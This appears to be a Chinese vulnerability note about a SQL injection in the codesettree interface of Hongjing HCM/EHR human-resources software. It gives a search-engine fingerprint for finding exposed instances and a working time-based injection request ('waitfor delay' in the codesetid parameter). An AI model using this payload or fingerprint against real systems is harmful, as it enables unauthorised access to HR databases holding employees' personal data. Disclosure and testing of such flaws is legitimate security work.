产品简介
宏景HCM系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招召聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。
漏洞概述
该漏洞存在于宏景EHR人力资源管理系统的codesettree 接口处,该功能存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库初被篡改或其他严重后果。
网络测绘
app="HJSOFT-HCM" || body="宏景" || body="hj-hy-all-one-logo" || body="/general/sys/hjaxmanage.js"
漏洞复现
GET /servlet/codesettree?flag=3&codesetid=111%27;waitfor+delay+%270:0:2%27--&